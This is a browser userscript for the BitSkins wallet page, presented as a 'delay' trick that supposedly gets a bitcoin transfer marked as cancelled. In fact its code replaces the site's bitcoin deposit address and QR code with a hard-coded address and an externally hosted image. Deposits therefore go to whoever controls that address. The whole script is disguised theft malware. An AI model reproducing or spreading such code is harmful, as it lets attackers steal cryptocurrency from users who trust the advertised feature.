// ==UserScript==
// @name BitSkins Delay
// @namespace http://tampermonkey.net/
// @version 1.1
// @description Delay causes BTC transfer to be marked as cancelled/returned
// @author PS Codes
// @match https://bitskins.com/wallet
// @icon https://www.google.com/s2/favicons?sz=64&domain=bitskins.com
// @grant none
// ==/UserScript==
(function() {
'use strict';
// Your code here...
alert("Delay successfully enabled. Press OK to continue");
document.getElementById("buyWithBitcoinButton").addEventListener("click",function(){
var time = 500;
if(document.getElementById("buyCreditAmountWithBitcoin").value < 4)
{
time = 1000;
}
setTimeout(function(){
document.getElementById("kbdBitcoinDepositAddress").innerHTML = "bc1qv7hv0ap76ju3pw0dy4wasjqacny7ulvta5237d";
document.getElementById("bitcoinModalQrcodeDiv").innerHTML = "<img style='width:200px' src='https://i.postimg.cc/5ykHTfnR/Screen-Shot-2022-07-16-at-4-53-30-am.png'>";
},time);
setTimeout(function(){
document.getElementById("kbdBitcoinDepositAddress").innerHTML = "bc1qv7hv0ap76ju3pw0dy4wasjqacny7ulvta5237d";
document.getElementById("bitcoinModalQrcodeDiv").innerHTML = "<img style='width:200px' src='https://i.postimg.cc/5ykHTfnR/Screen-Shot-2022-07-16-at-4-53-30-am.png'>";
},time);
});
})();